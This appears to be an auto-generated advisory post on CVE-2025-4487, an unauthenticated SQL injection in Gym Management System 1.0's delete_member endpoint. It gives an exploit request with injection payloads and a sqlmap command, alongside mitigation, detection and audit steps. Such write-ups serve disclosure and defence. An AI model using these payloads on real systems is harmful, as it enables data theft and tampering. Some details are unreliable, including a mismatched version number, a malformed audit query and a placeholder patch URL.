Gym Management System 10, SQL Injection, CVE-2025-4487 (Critical)

Listen to this Post

How CVE-2025-4487 Works

This vulnerability exists in Gym Management System 1.0 due to improper input sanitization in the `/ajax.php?action=delete_member` endpoint. The `ID` parameter is directly concatenated into an SQL query without validation, enabling attackers to inject malicious SQL payloads. By crafting a specially crafted request, an attacker can manipulate database queries, potentially extracting sensitive data, modifying records, or executing administrative operations. The attack is remotely exploitable with no authentication required, making it critical. The CVSS 4.0 vector (AV:N/AC:L/AT:N/PR:N/UI:N) confirms the ease of exploitation.

DailyCVE Form

Platform: Gym Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025

What Undercode Say:

Exploitation

POST /ajax.php?action=delete_member HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
ID=1' OR 1=1-- -
-- Extract database version
ID=1' UNION SELECT 1,version(),3,4-- -

Detection

sqlmap -u "http://target.com/ajax.php?action=delete_member" --data="ID=1" --risk=3 --level=5

Mitigation

1. Input Validation:

$id = mysqli_real_escape_string($conn, $_POST['ID']);

2. Prepared Statements:

$stmt = $conn->prepare("DELETE FROM members WHERE id = ?");
$stmt->bind_param("i", $_POST['ID']);

3. WAF Rules:

location ~ ajax.php {
deny all;
}

4. Log Analysis:

grep 'ajax.php?action=delete_member' /var/log/apache2/access.log | grep -E "UNION|SELECT|--"

5. Patch Upgrade:

wget https://vendor.com/patches/gymmgmt_1.1_fix.zip
unzip gymmgmt_1.1_fix.zip -d /var/www/html/

Post-Exploitation Analysis

-- Check for added admin users
SELECT FROM users WHERE role = 'admin';
Audit database permissions
mysql -u root -p -e "SHOW GRANTS FOR 'gymuser'@'localhost';"

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top